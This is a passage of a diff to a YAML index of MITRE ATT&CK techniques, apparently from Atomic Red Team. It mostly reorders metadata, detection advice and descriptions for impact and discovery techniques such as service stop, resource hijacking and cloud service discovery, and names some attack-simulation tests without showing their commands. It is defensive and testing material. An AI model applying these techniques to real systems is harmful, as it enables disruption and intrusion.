+ - Netflow/Enclave netflow
+ - Network intrusion detection system
+ - Network device logs
+ x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure AD
+ - SaaS
+ - Azure
+ - Office 365
atomic_tests: []
T1499.001:
technique:
@@ -34469,15 +35442,10 @@ impact:
phase_name: impact
modified: '2020-03-29T01:43:29.320Z'
created: '2020-02-20T15:27:18.581Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network device logs
- - Netflow/Enclave netflow
- - Network intrusion detection system
- - SSL/TLS inspection
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
x_mitre_detection: 'Detection of Endpoint DoS can sometimes be achieved before
the effect is sufficient to cause significant impact to the availability of
the service, but such response time typically requires very aggressive monitoring
@@ -34486,10 +35454,15 @@ impact:
utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative
study of the network traffic can identify a sudden surge in one type of protocol
can be used to detect an attack as it starts.'
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network device logs
+ - Netflow/Enclave netflow
+ - Network intrusion detection system
+ - SSL/TLS inspection
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1498.002:
technique:
@@ -34538,20 +35511,12 @@ impact:
phase_name: impact
modified: '2020-03-23T12:55:30.119Z'
created: '2020-03-02T20:08:03.691Z'
- x_mitre_platforms:
- - macOS
- - Windows
- - Linux
- - AWS
- - Office 365
- - Azure AD
- - GCP
- - Azure
- - SaaS
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Sensor health and status
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Network intrusion detection system
+ - Network device logs
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -34564,12 +35529,20 @@ impact:
the lead time may be small and the indicator of an event availability of the
network or service drops. The analysis tools mentioned can then be used to
determine the type of DoS causing the outage and help with remediation.'
- x_mitre_data_sources:
- - Sensor health and status
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Network intrusion detection system
- - Network device logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_platforms:
+ - macOS
+ - Windows
+ - Linux
+ - AWS
+ - Office 365
+ - Azure AD
+ - GCP
+ - Azure
+ - SaaS
atomic_tests: []
T1496:
technique:
@@ -34604,14 +35577,22 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2019-10-10T18:40:46.985Z'
+ modified: '2020-07-14T19:29:17.574Z'
created: '2019-04-17T14:50:05.682Z'
- x_mitre_detection: Consider monitoring process resource usage to determine anomalous
- activity associated with malicious hijacking of computer resources such as
- CPU, memory, and graphics processing resources. Monitor for suspicious use
- of network resources associated with cryptocurrency mining software. Monitor
- for common cryptomining software process names and files on local systems
- that may indicate compromise and resource usage.
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- Azure activity logs
- Stackdriver logs
@@ -34620,19 +35601,12 @@ impact:
- Process monitoring
- Network protocol analysis
- Network device logs
- x_mitre_version: '1.1'
- x_mitre_impact_type:
- - Availability
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
+ x_mitre_detection: Consider monitoring process resource usage to determine anomalous
+ activity associated with malicious hijacking of computer resources such as
+ CPU, memory, and graphics processing resources. Monitor for suspicious use
+ of network resources associated with cryptocurrency mining software. Monitor
+ for common cryptomining software process names and files on local systems
+ that may indicate compromise and resource usage.
identifier: T1496
atomic_tests:
- name: macOS/Linux - Simulate CPU Load with Yes
@@ -34650,6 +35624,21 @@ impact:
name: bash
T1565.003:
technique:
+ created: '2020-03-02T14:30:05.252Z'
+ modified: '2020-03-28T23:10:34.359Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ description: |-
+ Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ name: Runtime Data Manipulation
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1565.003
@@ -34662,21 +35651,6 @@ impact:
url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Runtime Data Manipulation
- description: |-
- Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- modified: '2020-03-28T23:10:34.359Z'
- created: '2020-03-02T14:30:05.252Z'
x_mitre_platforms:
- Linux
- macOS
@@ -34737,6 +35711,23 @@ impact:
phase_name: impact
modified: '2020-03-29T01:52:53.947Z'
created: '2020-02-20T15:31:43.613Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: |-
+ Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
+
+ In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+
+ Externally monitor the availability of services that may be targeted by an Endpoint DoS.
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Network device logs
+ - Network intrusion detection system
+ - Web application firewall logs
+ - Web logs
+ - SSL/TLS inspection
x_mitre_platforms:
- Linux
- macOS
@@ -34747,26 +35738,28 @@ impact:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Network device logs
- - Network intrusion detection system
- - Web application firewall logs
- - Web logs
- - SSL/TLS inspection
- x_mitre_detection: |-
- Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
-
- In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
-
- Externally monitor the availability of services that may be targeted by an Endpoint DoS.
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1489:
technique:
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ description: "Adversaries may stop or disable services on a system to render
+ those services unavailable to legitimate users. Stopping critical services
+ can inhibit or stop response to an incident or aid in the adversary's overall
+ objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer
+ 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by
+ disabling individual services of high importance to an organization, such
+ as MSExchangeIS, which will make Exchange content inaccessible
+ (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
+ many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ 2018) Services may not allow for modification of their data stores while running.
+ Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485)
+ or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)
+ on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks
+ WannaCry Analysis)"
+ name: Service Stop
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- external_id: T1489
source_name: mitre-attack
@@ -34784,31 +35777,13 @@ impact:
url: https://www.secureworks.com/research/wcry-ransomware-analysis
description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
Analysis. Retrieved March 26, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
- description: "Adversaries may stop or disable services on a system to render
- those services unavailable to legitimate users. Stopping critical services
- can inhibit or stop response to an incident or aid in the adversary's overall
- objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer
- 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by
- disabling individual services of high importance to an organization, such
- as MSExchangeIS, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
- 2018) Services may not allow for modification of their data stores while running.
- Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485)
- or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)
- on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks
- WannaCry Analysis)"
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2019-07-18T19:18:32.674Z'
+ modified: '2020-07-14T19:34:47.636Z'
created: '2019-03-29T19:00:55.901Z'
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
x_mitre_permissions_required:
@@ -34925,24 +35900,24 @@ impact:
phase_name: impact
modified: '2020-03-02T15:17:40.505Z'
created: '2020-03-02T14:22:24.410Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Application logs
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- x_mitre_impact_type:
- - Integrity
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
- Administrator
- root
- SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Integrity
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_data_sources:
+ - File monitoring
+ - Application logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1529:
technique:
@@ -34977,27 +35952,27 @@ impact:
phase_name: impact
modified: '2020-03-27T21:18:48.149Z'
created: '2019-10-04T20:42:28.541Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Windows event logs
- - Process command-line parameters
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: Use process monitoring to monitor the execution and command
+ line parameters of binaries involved in shutting down or rebooting systems.
+ Windows event logs may also designate activity associated with a shutdown/reboot,
+ ex. Event ID 1074 and 6006.
+ x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Availability
x_mitre_permissions_required:
- User
- Administrator
- root
- SYSTEM
- x_mitre_impact_type:
- - Availability
- x_mitre_version: '1.0'
- x_mitre_detection: Use process monitoring to monitor the execution and command
- line parameters of binaries involved in shutting down or rebooting systems.
- Windows event logs may also designate activity associated with a shutdown/reboot,
- ex. Event ID 1074 and 6006.
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1529
atomic_tests:
- name: Shutdown System - Windows
@@ -35169,28 +36144,28 @@ impact:
phase_name: impact
modified: '2020-03-02T15:20:28.455Z'
created: '2020-03-02T14:27:00.693Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ - root
+ x_mitre_impact_type:
+ - Integrity
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- x_mitre_impact_type:
- - Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
discovery:
T1087:
@@ -35213,22 +36188,7 @@ discovery:
phase_name: discovery
modified: '2020-03-26T15:27:59.127Z'
created: '2017-05-31T21:31:06.988Z'
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - Azure activity logs
- - Office 365 account logs
- - API monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
@@ -35239,7 +36199,22 @@ discovery:
- GCP
- Azure
- SaaS
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Office 365 account logs
+ - API monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ - Travis Smith, Tripwire
+ x_mitre_version: '2.1'
atomic_tests: []
T1010:
technique:
@@ -35261,21 +36236,21 @@ discovery:
phase_name: discovery
modified: '2020-03-26T15:44:27.068Z'
created: '2017-05-31T21:30:24.512Z'
- x_mitre_version: '1.1'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - macOS
+ - Windows
x_mitre_data_sources:
- API monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.1'
identifier: T1010
atomic_tests:
- name: List Process Main Windows - C# .NET
@@ -35333,25 +36308,25 @@ discovery:
phase_name: discovery
modified: '2020-03-26T16:06:07.367Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Mike Kemmerer
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.
x_mitre_data_sources:
- API monitoring
- File monitoring
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Mike Kemmerer
+ x_mitre_version: '1.0'
identifier: T1217
atomic_tests:
- name: List Mozilla Firefox Bookmark Database Files on Linux
@@ -35496,6 +36471,19 @@ discovery:
phase_name: discovery
modified: '2020-03-13T20:05:15.448Z'
created: '2020-02-21T21:08:36.570Z'
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Office 365 account logs
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- AWS
- GCP
@@ -35503,19 +36491,6 @@ discovery:
- Office 365
- Azure AD
- SaaS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information.
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Azure activity logs
- - Office 365 account logs
- - Process monitoring
- - Process command-line parameters
atomic_tests: []
T1069.003:
technique:
@@ -35554,23 +36529,23 @@ discovery:
phase_name: discovery
modified: '2020-03-12T19:25:12.782Z'
created: '2020-02-21T21:15:33.222Z'
- x_mitre_platforms:
- - Office 365
- - Azure AD
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.
- x_mitre_permissions_required:
- - User
x_mitre_data_sources:
- Azure activity logs
- Office 365 account logs
- API monitoring
- Process monitoring
- Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Office 365
+ - Azure AD
atomic_tests: []
T1538:
technique:
@@ -35599,54 +36574,78 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2019-10-23T14:19:37.289Z'
+ modified: '2020-07-14T19:19:00.966Z'
created: '2019-08-30T18:11:24.582Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: 'Monitor account activity logs to see actions performed and
+ activity associated with the cloud service management console. Some cloud
+ providers, such as AWS, provide distinct log events for login attempts to
+ the management console.(Citation: AWS Console Sign-in Events)'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Azure activity logs
+ - Stackdriver logs
+ - AWS CloudTrail logs
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Praetorian
x_mitre_platforms:
- AWS
- GCP
- Azure
- Azure AD
- Office 365
- x_mitre_contributors:
- - Praetorian
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Office 365 audit logs
- - Azure activity logs
- - Stackdriver logs
- - AWS CloudTrail logs
- x_mitre_detection: 'Monitor account activity logs to see actions performed and
- activity associated with the cloud service management console. Some cloud
- providers, such as AWS, provide distinct log events for login attempts to
- the management console.(Citation: AWS Console Sign-in Events)'
atomic_tests: []
T1526:
technique:
+ created: '2019-08-30T13:01:10.120Z'
+ modified: '2020-06-23T14:31:41.758Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
+ description: "An adversary may attempt to enumerate the cloud services running
+ on a system after gaining access. These methods can differ from platform-as-a-service
+ (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS).
+ Many services exist throughout the various cloud providers and can include
+ Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions,
+ Azure AD, etc. \n\nAdversaries may attempt to discover information about the
+ services enabled throughout the environment. Azure tools and APIs, such as
+ the Azure AD Graph API and Azure Resource Manager API, can enumerate resources
+ and services, including applications, management groups, resources and policy
+ definitions, and their relationships that are accessible by an identity.(Citation:
+ Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter
+ is an open source tool for enumerating and constructing a graph for Azure
+ resources and services, and Pacu is an open source AWS exploitation framework
+ that supports several methods for discovering cloud services.(Citation: Azure
+ - Stormspotter)(Citation: GitHub Pacu)"
+ name: Cloud Service Discovery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- - external_id: T1526
- source_name: mitre-attack
+ - source_name: mitre-attack
+ external_id: T1526
url: https://attack.mitre.org/techniques/T1526
+ - source_name: Azure - Resource Manager API
+ url: https://docs.microsoft.com/en-us/rest/api/resources/
+ description: Microsoft. (2019, May 20). Azure Resource Manager. Retrieved
+ June 17, 2020.
+ - source_name: Azure AD Graph API
+ url: https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview
+ description: Microsoft. (2016, March 26). Operations overview | Graph API
+ concepts. Retrieved June 18, 2020.
+ - source_name: Azure - Stormspotter
+ url: https://github.com/Azure/Stormspotter
+ description: Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June
+ 17, 2020.
- source_name: GitHub Pacu
url: https://github.com/RhinoSecurityLabs/pacu
description: Rhino Security Labs. (2019, August 22). Pacu. Retrieved October
17, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Service Discovery
- description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ depending on if it's platform-as-a-service (PaaS), infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many different services exist throughout the various cloud providers and can include continuous integration and continuous delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries may attempt to discover information about the services enabled throughout the environment.
-
- Pacu, an open source AWS exploitation framework, supports several methods for discovering cloud services.(Citation: GitHub Pacu)
- id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2019-10-17T19:11:02.353Z'
- created: '2019-08-30T13:01:10.120Z'
x_mitre_platforms:
- AWS
- GCP
@@ -35655,10 +36654,11 @@ discovery:
- Office 365
- SaaS
x_mitre_contributors:
+ - Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
x_mitre_permissions_required:
- User
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- Azure activity logs
- Stackdriver logs
@@ -35667,6 +36667,7 @@ discovery:
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1087.002:
technique:
@@ -35692,21 +36693,21 @@ discovery:
phase_name: discovery
modified: '2020-03-26T13:42:34.402Z'
created: '2020-02-21T21:08:26.480Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
x_mitre_data_sources:
- API monitoring
- Process monitoring
- Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1087.002
atomic_tests:
- name: Enumerate all accounts (Domain)
@@ -35814,22 +36815,22 @@ discovery:
phase_name: discovery
modified: '2020-03-12T19:07:53.043Z'
created: '2020-02-21T21:15:06.561Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
